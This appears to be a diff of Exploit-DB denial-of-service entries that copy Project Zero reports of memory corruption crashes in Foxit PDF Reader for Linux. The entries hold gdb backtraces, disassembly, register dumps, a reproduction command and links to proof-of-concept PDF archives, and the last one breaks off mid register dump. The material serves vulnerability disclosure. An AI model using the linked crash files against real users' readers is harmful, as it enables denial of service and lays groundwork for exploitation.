+#6  0x00000000006c9d49 in CFX_Edit::SetRichTextByXML(wchar_t const*, wchar_t const*, int, int) ()
+#7  0x000000000067e995 in CPWL_Note_Contents::SetRichText(CFX_WideString const&) ()
+#8  0x000000000067e9e5 in CPWL_NoteItem::SetRichContents(CFX_WideString const&) ()
+#9  0x00000000005cbcc7 in CMarkup_Popup::SetNoteContents(CFX_WideString const&, CReader_PageView*) ()
+#10 0x00000000005ca0e7 in CMarkup_Popup::InitNote(CReader_PageView*) ()
+#11 0x00000000005ca420 in CMarkup_Popup::CreateNote(CReader_PageView*, int) ()
+#12 0x00000000005cd578 in CMarkup_Popup::UpdateNote(CReader_PageView*, int) ()
+#13 0x00000000005d2475 in CMarkup_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
+#14 0x00000000006e733e in CTA_AnnotHandler::OnPageVisible(CReader_PageView*, CReader_Annot*) ()
+#15 0x0000000000640424 in CBA_PageEventHandler::OnPageVisible(CReader_PageView*) ()
+#16 0x0000000000461d1b in CReader_AppEx::OnPageVisible (this=0x14a5120, pDocView=0x19446a0)
+    at ../../Readerlite/ReaderLite/src/frd_appex.cpp:2901
+#17 0x0000000000450bec in CReader_ViewPage::DoPageVisibleAction (this=0x1944670)
+    at ../../Readerlite/ReaderLite/src/preview.cpp:3204
+x#18 0x000000000044b980 in CPDF_TVPreview::Slot_DoPageVisibleEvent (this=0x1943180)
+    at ../../Readerlite/ReaderLite/src/preview.cpp:1443
+#19 0x000000000044e333 in CPDFViewerEventHandler::OnFinishRender (this=0x194c520)
+    at ../../Readerlite/ReaderLite/src/preview.cpp:2386
+#20 0x000000000061db28 in CPDFViewerEx::ContinueRendering() ()
+#21 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
+#22 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1943180)
+    at ../../Readerlite/ReaderLite/src/preview.cpp:1305
+#23 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#24 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#25 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#26 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#27 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#29 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#30 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#31 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#34 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#35 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+---Type <return> to continue, or q <return> to quit---   
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#37 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#38 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#39 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#40 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#41 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#42 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#43 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#44 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#45 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#46 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#47 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#48 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#49 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#50 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#51 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#52 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
+#53 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#54 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#55 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#56 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#57 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#58 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#59 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
+(gdb) x/10i $rip
+=> 0xab467f <_ZN14CFX_WideStringaSERKS_+51>:    cmpq   $0x0,0x0(%r13)
+   0xab4684 <_ZN14CFX_WideStringaSERKS_+56>:    js     0xab4692 <_ZN14CFX_WideStringaSERKS_+70>
+   0xab4686 <_ZN14CFX_WideStringaSERKS_+58>:    test   %rbp,%rbp
+   0xab4689 <_ZN14CFX_WideStringaSERKS_+61>:    je     0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
+   0xab468b <_ZN14CFX_WideStringaSERKS_+63>:    cmpq   $0x0,0x0(%rbp)
+   0xab4690 <_ZN14CFX_WideStringaSERKS_+68>:    jns    0xab46a3 <_ZN14CFX_WideStringaSERKS_+87>
+   0xab4692 <_ZN14CFX_WideStringaSERKS_+70>:    mov    0x8(%rbp),%esi
+   0xab4695 <_ZN14CFX_WideStringaSERKS_+73>:    lea    0x10(%rbp),%rdx
+   0xab4699 <_ZN14CFX_WideStringaSERKS_+77>:    mov    %rbx,%rdi
+   0xab469c <_ZN14CFX_WideStringaSERKS_+80>:    callq  0xab45a8 <_ZN14CFX_WideString10AssignCopyEiPKw>
+(gdb) info reg $r13
+r13            0x740000006e     498216206446
+--- cut ---
+
+Attached is a proof of concept PDF file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39942.zip
+

platforms/linux/dos/39943.txt

@@ -0,0 +1,123 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=743
+
+We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
+
+$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
+
+The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
+
+An example excerpt from the crash log is as follows:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
+(gdb) info reg $rdx
+rdx            0x90ff9fc23e15101d       -7998498756572671971
+(gdb) where
+#0  0x00000000008ee95d in kdu_core::kdu_codestream::get_subsampling(int, kdu_core::kdu_coords&, bool) ()
+#1  0x0000000000922297 in kdu_supp::kdu_region_decompressor::start(kdu_core::kdu_codestream, kdu_supp::kdu_channel_mapping*, int, int, int, kdu_core::kdu_dims, kdu_core::kdu_coords, kdu_core::kdu_coords, bool, kdu_core::kdu_component_access_mode, bool, kdu_core::kdu_thread_env*, kdu_core::kdu_thread_queue*) ()
+#2  0x00000000008bd50d in CJPX_Decoder::Start(unsigned char*, int, int, unsigned char*) ()
+#3  0x00000000007f8d77 in CPDF_DIBSource::StartLoadJpxBitmap() ()
+#4  0x00000000007f9137 in CPDF_DIBSource::CreateDecoder() ()
+#5  0x00000000007fadb0 in CPDF_DIBSource::StartLoadDIBSource(CPDF_Document*, CPDF_Stream const*, int, CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int) ()
+#6  0x00000000007f2f74 in CPDF_ImageCache::StartGetCachedBitmap(CPDF_Dictionary*, CPDF_Dictionary*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#7  0x00000000007f3ba0 in CPDF_PageRenderCache::StartGetCachedBitmap(CPDF_Stream*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#8  0x00000000007fb00d in CPDF_ProgressiveImageLoaderHandle::Start(CPDF_ImageLoader*, CPDF_ImageObject const*, CPDF_PageRenderCache*, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#9  0x00000000007fb13b in CPDF_ImageLoader::StartLoadImage(CPDF_ImageObject const*, CPDF_PageRenderCache*, void*&, int, unsigned int, int, CPDF_RenderStatus*, int, int) ()
+#10 0x00000000007f42ff in CPDF_ImageRenderer::StartLoadDIBSource() ()
+#11 0x00000000007f6782 in CPDF_ImageRenderer::Start(CPDF_RenderStatus*, CPDF_PageObject const*, CFX_Matrix const*, int, int) ()
+#12 0x00000000007f1689 in CPDF_RenderStatus::ContinueSingleObject(CPDF_PageObject const*, CFX_Matrix const*, IFX_Pause*) ()
+#13 0x00000000007f237a in CPDF_ProgressiveRenderer::Continue(IFX_Pause*) ()
+#14 0x000000000061d75d in CPDFViewerPageEx::Rendering(CFX_DIBitmap*, int, int, int, int, int, CPDF_RenderOptions*) ()
+#15 0x000000000061d9cb in CPDFViewerPageEx::DrawPageContent(CFX_DIBitmap*, CFX_ViewRect&) ()
+#16 0x000000000061da6a in CPDFViewerEx::DrawPages(CFX_DIBitmap*) ()
+#17 0x000000000061daa8 in CPDFViewerEx::Paint(CFX_DIBitmap*) ()
+#18 0x000000000061daf1 in CPDFViewerEx::ContinueRendering() ()
+#19 0x000000000061de17 in CPDFViewerEx::GetRenderData(int) ()
+#20 0x000000000044b274 in CPDF_TVPreview::paintEvent (this=0x1946d30)
+    at ../../Readerlite/ReaderLite/src/preview.cpp:1305
+#21 0x00007ffff74c2302 in QWidget::event(QEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#22 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#23 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#24 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#25 0x00007ffff74bcbea in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#26 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#27 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#28 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#29 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#30 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#31 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#32 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#33 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#34 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, Q---Type <return> to continue, or q <return> to quit---
+Region const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#35 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#36 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#37 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#38 0x00007ffff74bd5bc in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#39 0x00007ffff74bd434 in QWidgetPrivate::paintSiblingsRecursive(QPaintDevice*, QList<QObject*> const&, int, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#40 0x00007ffff74bc786 in QWidgetPrivate::drawWidget(QPaintDevice*, QRegion const&, QPoint const&, int, QPainter*, QWidgetBackingStore*) () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#41 0x00007ffff7493233 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#42 0x00007ffff7493941 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#43 0x00007ffff74e0973 in ?? () from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#44 0x00007ffff7486c8c in QApplicationPrivate::notify_helper(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#45 0x00007ffff748be56 in QApplication::notify(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#46 0x00007ffff6340c2d in QCoreApplication::notifyInternal(QObject*, QEvent*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#47 0x00007ffff6860ea6 in QGuiApplicationPrivate::processExposeEvent(QWindowSystemInterfacePrivate::ExposeEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#48 0x00007ffff6861995 in QGuiApplicationPrivate::processWindowSystemEvent(QWindowSystemInterfacePrivate::WindowSystemEvent*) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#49 0x00007ffff684a858 in QWindowSystemInterface::sendWindowSystemEvents(QFlags<QEventLoop::ProcessEventsFlag>) () from /usr/lib/x86_64-linux-gnu/libQt5Gui.so.5
+#50 0x00007fffecc415b0 in ?? () from /usr/lib/x86_64-linux-gnu/qt5/plugins/platforms/libqxcb.so
+#51 0x00007ffff4a79e04 in g_main_context_dispatch () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#52 0x00007ffff4a7a048 in ?? () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#53 0x00007ffff4a7a0ec in g_main_context_iteration () from /lib/x86_64-linux-gnu/libglib-2.0.so.0
+#54 0x00007ffff638d98c in QEventDispatcherGlib::processEvents(QFlags<QEventLoop::ProcessEventsFlag>) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#55 0x00007ffff633f96b in QEventLoop::exec(QFlags<QEventLoop::ProcessEventsFlag>) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#56 0x00007ffff63460e1 in QCoreApplication::exec() () from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#57 0x0000000000439e25 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:310
+(gdb) x/10i $rip
+=> 0x8ee95d <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+135>:    mov    0x4(%rdx),%rcx
+   0x8ee961 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+139>:    mov    %rcx,(%rbx)
+   0x8ee964 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+142>:
+    movslq 0x320(%rax),%rcx
+   0x8ee96b <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+149>:    mov    0x4(%rbx),%esi
+   0x8ee96e <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+152>:
+    movzbl 0x19(%rdx,%rcx,1),%ecx
+   0x8ee973 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+157>:    shl    %cl,%esi
+   0x8ee975 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+159>:
+    movslq 0x320(%rax),%rcx
+   0x8ee97c <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+166>:    mov    %esi,0x4(%rbx)
+   0x8ee97f <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+169>:
+    movzbl 0x3a(%rdx,%rcx,1),%ecx
+   0x8ee984 <_ZN8kdu_core14kdu_codestream15get_subsamplingEiRNS_10kdu_coordsEb+174>:    mov    (%rbx),%edx
+(gdb) info reg $rdx
+rdx            0x90ff9fc23e15101d       -7998498756572671971
+(gdb) x/10wx $dx
+0x101d: Cannot access memory at address 0x101d
+(gdb) x/10wx $rdx
+0x90ff9fc23e15101d:     Cannot access memory at address 0x90ff9fc23e15101d
+--- cut ---
+
+Attached is a proof of concept PDF file.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39943.zip
+

platforms/linux/dos/39944.txt

@@ -0,0 +1,158 @@
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=742
+
+We have identified the following memory corruption vulnerability in Foxit PDF Reader (version 1.0.1.0925 for Linux 64-bit), when started with a specially crafted PDF file in the following way:
+
+$ DISPLAY=:1 FoxitReader /path/to/poc/file.pdf
+
+The DISPLAY=:1 environment variable is set due to the fact that we are testing the application with a virtual X server (Xvfb), but the issue should be equally reproducible with the program started with standard display settings, too.
+
+An example excerpt from the crash log is as follows:
+
+--- cut ---
+Program received signal SIGSEGV, Segmentation fault.
+0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
+(gdb) where
+#0  0x0000000000aab96c in CFX_BaseSegmentedArray::IterateIndex(int, int&, void**, int (*)(void*, void*), void*) const ()
+#1  0x0000000000aab9dc in CFX_BaseSegmentedArray::Iterate(int (*)(void*, void*), void*) const ()
+#2  0x0000000000ab1a99 in CFX_CMapByteStringToPtr::Lookup(CFX_ByteStringC const&, void*&) const ()
+#3  0x00000000007db5df in CPDF_Dictionary::KeyExist(CFX_ByteStringC const&) const ()
+#4  0x000000000070e6a6 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
+#5  0x000000000070e6e3 in CBMTreeCtrl::GotoBookmark(CPDF_Bookmark, CPDF_Bookmark) ()
+#6  0x000000000070f986 in CBMTreeCtrl::on_ItemExpanded(QTreeWidgetItem*) ()
+#7  0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#8  0x00007ffff7722612 in QTreeWidget::itemExpanded(QTreeWidgetItem*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#9  0x00007ffff63682a6 in QMetaObject::activate(QObject*, int, int, void**) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Core.so.5
+#10 0x00007ffff76ecc92 in QTreeView::expanded(QModelIndex const&) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#11 0x00007ffff76f8903 in QTreeView::expand(QModelIndex const&) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#12 0x00007ffff7724e44 in QTreeWidget::expandItem(QTreeWidgetItem const*) ()
+   from /usr/lib/x86_64-linux-gnu/libQt5Widgets.so.5
+#13 0x000000000070a0cb in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
+#14 0x000000000070a4c7 in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
+#15 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
+#16 0x000000000070a83d in CBMTreeView::ReBuildTree_Proc(CFX_BookMarkPanelToolHandler*, CPDF_Document*, CPDF_Bookmark, QTreeWidgetItem*, int, int) ()
+#17 0x000000000070beb6 in CBMTreeView::ReBuildTree(int) ()
+#18 0x000000000051eaff in CChildFrame::GetPanelMgrEx (this=0x1a1c3b0)
+    at ../../Readerlite/ReaderLite/src/childframe.cpp:91
+#19 0x00000000005000c1 in CReader_DocViewEx::InitViewData (this=0x194ce60)
+    at ../../Readerlite/ReaderLite/src/frd_docviewex.cpp:61
+#20 0x000000000048e691 in CPDF_OwnerFileTypeHandler::OpenContinueNormal (this=0x14c5470, pdoc=0x193a720, 
+    filePath=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:99
+#21 0x000000000048f754 in CPDF_OwnerFileTypeHandler::DoOpen (this=0x14c5470, csFilterName=..., 
+    wsPathName=...) at ../../Readerlite/ReaderLite/src/pdfeventhandler.cpp:216
+#22 0x000000000045d038 in CReader_AppEx::OwnerFileTypeHandlerDoOpen (this=0x14a47e0, csFDFFile=...)
+    at ../../Readerlite/ReaderLite/src/frd_appex.cpp:941
+#23 0x000000000043caac in CMainWindow::OpenFile (this=0x14c4240, fileName=...)
+    at ../../Readerlite/ReaderLite/src/mainwindow.cpp:434
+#24 0x0000000000439da9 in main (argc=2, argv=0x7fffffffe298) at ../../Readerlite/ReaderLite/src/main.cpp:301
+(gdb) x/10i $rip
+=> 0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>:
+    mov    0x0(%r13,%rbp,8),%rcx
+   0xaab971 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+99>:        test   %rcx,%rcx
+   0xaab974 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+102>:
+    jne    0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>
+   0xaab976 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+104>:       inc    %rbp
+   0xaab979 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+107>:       movzbl 0xe(%rbx),%eax
+   0xaab97d <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+111>:       cmp    %ebp,%eax
+   0xaab97f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+113>:
+    jg     0xaab96c <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+94>
+   0xaab981 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+115>:
+    jmp    0xaab99f <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+145>
+   0xaab983 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+117>:       mov    0xc(%rsp),%esi
+   0xaab987 <_ZNK22CFX_BaseSegmentedArray12IterateIndexEiRiPPvPFiS1_S1_ES1_+121>:       mov    %r15,%r9
+(gdb) info reg
+rax            0x7c     124
+rbx            0x1a66130        27681072
+rcx            0xe1a704fcae02ca58       -2186773610767398312
+rdx            0x7fffffffceec   140737488342764
+rsi            0x2f     47
+rdi            0x1a66130        27681072
+rbp            0x0      0x0
+rsp            0x7fffffffce90   0x7fffffffce90
+r8             0xab0f92 11210642
+r9             0x6a83f4ca       1787032778
+r10            0xfd     253
+r11            0x0      0
+r12            0x7fffffffceec   140737488342764
+r13            0xe1a704fcae02ca58       -2186773610767398312
+r14            0xab0f92 11210642
+r15            0x6a83f4ca       1787032778
